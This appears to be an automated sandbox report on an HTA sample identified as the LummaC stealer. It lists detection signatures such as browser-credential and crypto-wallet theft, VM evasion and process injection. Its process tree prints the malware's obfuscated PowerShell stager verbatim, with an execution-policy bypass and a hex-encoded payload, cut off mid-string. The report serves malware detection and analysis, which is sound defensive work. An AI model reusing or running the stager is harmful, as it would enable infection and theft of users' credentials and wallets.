Edit tour
Windows
Analysis Report
winwidgetshp.mp4.hta
Overview
General Information
Detection
LummaC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Yara detected MSILLoadEncryptedAssembly
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 7064 cmdline:
mshta.exe "C:\Users\ user\Deskt op\winwidg etshp.mp4. hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 2656 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction htXb x($EYwy){r eturn -spl it ($EYwy -replace ' ..', '0x$& ')};$sMkL = htXbx(' 0F7A7222E1 7CFB1BB921 72CFD10B1A 0A35F2D236 DE6DD8D72D 66B13FEDB4 D7CF6A19FA 5E844D4EA4 BDA294B832 4F3D40BBE3 A32FA2F602 F7EEC40E64 690703556F 440E32E54D B889F70490 BFAB024711 BA156E7EF3 961FB11712 0CBA4913EA 1E5D84ACF6 F55EBA7C85 C4EDEAE94C A6F88E91D9 8428FF8C02 DEA04EB6BC 87CD7054DA 2412B8E711 F8C1A790ED D10E333005 49B54953E9 93973674C4 C6B322DF9A 94608D0E38 BF1B68335F 96BFDC063A 0ACAC3F567 4C4FB62FD4 21AFD6B984 37F6E98054 48603B36D2 3A3100350C 5424A024DE BEE06EFCCB 25BC5C2ED9 E55F0ECDF8 D82A5F5B3D DE3DD01D94 14613DC77C 41FF371478 7CA86BAB94 1A84FA1697 BFD67AE144 2E846F4C0B CD12067B97 F4C4761C79 0D99134685 BD29D33EB1 3930E88134 8CCEB581A3 92F1C4D3A9 54998DE262 A182E3BA19 2BC0309726 31DFF7761B 192A8E761F B393F15CEC 5503F48199 3757B7386A 6DEFCB3089 3CB5510F8D 9DFCD357A4 5036571219 93C1DA2061 9FC16A7682 9A33DC8BEC 2C25B345E4 0D743AE3FA 6908A22561 06EDB3D401 A541BBC6B6 3D25361ED3 38A28142AE DFD2E2AFA4 224709FD2A B99578CAD2 D426AC01B6 25107469B2 CFC6F80544 CD0418A85D F7B0034592 F05C391690 F1CB1F0E38 C8C3698495 8B67198216 8DA7FCD4BA 7B76DA7D1F 52FBD0449C 19027B914F DE6DE5FAAA 8CB6BF3F2A 4274A8F5CC EED4E85FE2 BAE43E079D B816A326CF EC5CF89E8B DA8C7656D7 ABB6815645 58044E3E53 669EE99940 92F98411AB 22F4889A34 54BB3DA679 1DB0F9C478 30F4C06A54 61824C4CD5 AF8028E685 AAA4298897 434D4728ED CF0C7F21C0 C4A773C3B9 3B8D500AD8 247E5F882A 6D58627B28 48A409F593 26CE2F3C94 419453CBD8 1D72A42EFC 7700BF0F75 5EBF04E26A DC65680A8A B81DC31B38 6413F68BDC DF1C0851EA BFB0BBAE9C CC1EEC68F5 0A6C1E0D56 474F854AE2 306A1E2A3F 8B94A0127D D3E51C4A53 6048EF14CD BF4B53A4E0 C3EEFEFA4E ED2CFE4541 E54F2D6977 3940D13F90 15002C0555 FDC4582088 3EE8D40D25 214D7139E6 E12032C2BF E100C55FA4 0524F297C4 39B1A01353 D2284C6CEF 35AC57E440 0EDA829B3E 642624CDFA 0BC2973809 DC3345E9E5 6C2D115614 7CEA34B91C FFF59896E5 4208B4CFD4 207A17F730 8C33D76C64 13AB80C8D9 2695DDC466 BC03F75D41 79A7F1740B 7A3E5A6C6D 80F2FB8D74 FFB55BD62E 27D14A6503 857D18986D 8E19A1D8E3 5AD79FEE15 0ABE148D1B 1C3E2D9D92 C0B0BDF7DE 18DFF55FD0 2B3212CC62 401C8900CA ECAAADE536 1BFC807F53 84EEA46BAB DA1F203276 9CDA2B56A7 25574AD832 150B7026D0 6D0547D377 43BD92A325 3A6BE7C4BE 7457307E6C DE57B7840C 35ECC06809 A8FA8BF235 1601EA6C1E 3A025BA6CD 107626BBF1 6CFED99355 A4AC130AD2 BEF7D8E3B1 D936DC4D66 7BAE44082E 02E0251C23 5571288557 5901AEFDC0 139AA662D0 B9C4ACBF74 03673B3C7D DF9E6E3AB1 5A286FC41C 2D998ED91E DD22436BA6 1DD3F3D745 E36681712D 110962FBD6 42A2CB9018 01E7AF3286 96116A425A C0D6F7C474 A297EBC5F8 9A3C52EE8D B03DE0214B 816208AD47 E4A4EB4864 F152130AEA 847AD1031A 9DDED4248D